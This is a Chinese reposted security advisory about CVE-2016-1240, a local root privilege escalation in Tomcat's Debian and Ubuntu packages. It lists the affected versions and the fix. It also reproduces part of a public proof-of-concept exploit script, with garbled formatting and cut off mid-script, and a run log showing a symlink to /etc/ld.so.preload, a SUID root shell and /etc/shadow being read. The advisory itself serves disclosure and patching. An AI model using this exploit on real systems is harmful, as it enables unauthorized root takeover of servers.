漏洞预警:Tomcat曝本地提权漏洞 (CVE20161240 附PoC)
Tomcat于10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不大,受影响的用户需要特别关注。
漏洞预警:Tomcat曝本地提权漏洞 (CVE-2016-1240 附PoC)
漏洞预警:Tomcat曝本地提权漏洞 (CVE-2016-1240 附PoC)
笔者QQ:381493251
博客地址:www.abcdocker.com
微信公众号:abcdocker
Abcdocker交流群:454666672
如果遇到什么问题可以进群询问,我们是一个乐于帮助的集体!
Tomcat于10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不大,受影响的用户需要特别关注。
Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Apache运行。

漏洞编号: CVE-2016-1240 影响范围:
Tomcat 8 <= 8.0.36-2 Tomcat 7 <= 7.0.70-2 Tomcat 6 <= 6.0.45+dfsg-1~deb8u1
受影响的系统包括Debian、Ubuntu,其他使用相应deb包的系统也可能受到影响。 修复方案: Debian安全团队已经修复了受影响的包;更新至系统提供的最新版Tomcat包即可。 漏洞概述: Debian系统的Linux上管理员通常利用apt-get进行包管理,CVE-2016-1240这一漏洞其问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本:/etc/init.d/tocat* 利用该脚本,可导致攻击者通过低权限的Tomcat用户获得系统root权限!
# Run the catalina.sh script as a daemon set +e touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
本地攻击者,作为tomcat用户(比如说,通过web应用的漏洞)若将catalina.out修改为指向任意系统文件的链接,一旦Tomcat init脚本(ROOT权限运行)在服务重启后再次打开catalina.out文件,攻击者就可获取ROOT权限。 漏洞PoC:
#!/bin/bash 1. 1. Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit 1. 1. CVE-2016-1240 1. 1. Discovered and coded by: 1. 1. Dawid Golunski 1. http://legalhackers.com 1. 1. This exploit targets Tomcat (versions 6, 7 and 8) packaging on 1. Debian-based distros including Debian, Ubuntu etc. 1. It allows attackers with a tomcat shell (e.g. obtained remotely through a 1. vulnerable java webapp, or locally via weak permissions on webapps in the 1. Tomcat webroot directories etc.) to escalate their privileges to root. 1. 1. Usage: 1. ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] 1. 1. The exploit can used in two ways: 1. 1. -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly 1. gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 1. It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up 1. a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) 1. 1. -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to 1. /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 1. Attackers can come back at a later time and check on the /etc/default/locale file. Upon a 1. Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can 1. then add arbitrary commands to the file which will be executed with root privileges by 1. the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default 1. Ubuntu/Debian Tomcat installations). 1. 1. See full advisory for details at: 1. http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html 1. 1. Disclaimer: 1. For testing purposes only. Do no harm. 1. BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/tomcatrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { 1. Cleanup echo -e "n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $TOMCATLOG touch $TOMCATLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload 2>/dev/null fi echo -e "n[+] Job done. Exiting with code $1 n" exit $1 } function ctrl_c() { echo -e "n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." cleanexit 0 } #intro echo -e "
Poc运行示例:
tomcat7@ubuntu:/tmp$ id uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) tomcat7@ubuntu:/tmp$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04 LTS Release: 16.04 Codename: xenial tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit CVE-2016-1240 Discovered and coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit in [active] mode with the following privileges: uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) [+] Target Tomcat log file set to /var/log/tomcat7/catalina.out [+] Compiling the privesc shared library (/tmp/privesclib.c) [+] Backdoor/low-priv shell installed at: -rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh [+] Symlink created at: lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload [+] Waiting for Tomcat to re-open the logs/Tomcat service restart... You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;) [+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: -rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload [+] The /etc/ld.so.preload file now contains: /tmp/privesclib.so [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! [+] Rootshell got assigned root SUID perms at: -rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh Please tell me you're seeing this too ;) [+] Executing the rootshell /tmp/tomcatrootsh now! tomcatrootsh-4.3# id uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7) tomcatrootsh-4.3# whoami root tomcatrootsh-4.3# head -n3 /etc/shadow root:$6$oaf[cut]:16912:0:99999:7::: daemon:*:16912:0:99999:7::: bin:*:16912:0:99999:7::: tomcatrootsh-4.3# exit exit
*编译:漏洞盒子安全团队,消息来源:Twitter,转载请注明来自FreeBuf.COM 原文:http://www.freebuf.com/vuls/115862.html?spm=5176.2020520154.sas.14.Ha4Thk

相关文章:
- Xtrabackup安装以及应用
- 自动化运维工具之–Cobbler
- Kubernetes 1.14 二进制集群安装
- Shell 变量及函数讲解 [2]